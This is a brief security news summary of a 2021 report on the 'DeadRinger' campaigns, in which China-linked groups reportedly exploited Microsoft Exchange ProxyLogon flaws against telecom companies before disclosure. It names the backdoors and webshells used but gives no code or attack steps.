Security News > 2021 > August > ‘DeadRinger’ Targeted Exchange Servers Long Before Discovery

Threat actors linked to China exploited the notorious Microsoft Exchange ProxyLogon vulnerabilities long before they were publicly disclosed, in attacks against telecommunications companies aimed at stealing sensitive customer data and maintaining network persistence, researchers have found.

Threat actors used similar tactics to those exposed recently in the Hafnium zero-day attacks - which were recently blamed on China and condemned by the White House - that exploited ProxyLogon vulnerabilities in Microsoft Exchange Servers to gain access to the targeted networks, according to the report.

Overall, the attacks show an aggressive assault by China on the security of critical infrastructure that - similarly to the SolarWinds and Kaseya attacks - compromise third-party service providers to ultimately attack their customers while undermining those trust relationships and causing other collateral damage, Cybereason CEO and co-founder Lior Div said.

These attackers leverage Microsoft Exchange vulnerabilities to install the ChinaChopper Webshell and gain a foothold using the PcShare backdoor.

Researchers still don't know how Naikon APT initially compromises its targeted networks, but have observed the group using the Nebulae backdoor and other tools to perform similar activities to SoftCell once attackers gain a foothold.

They also might be the work of Chinese APT Group-3390, given the use of a "Unique OWA backdoor" deployed across multiple Microsoft Exchange and IIS servers in the attacks.

News URL

https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/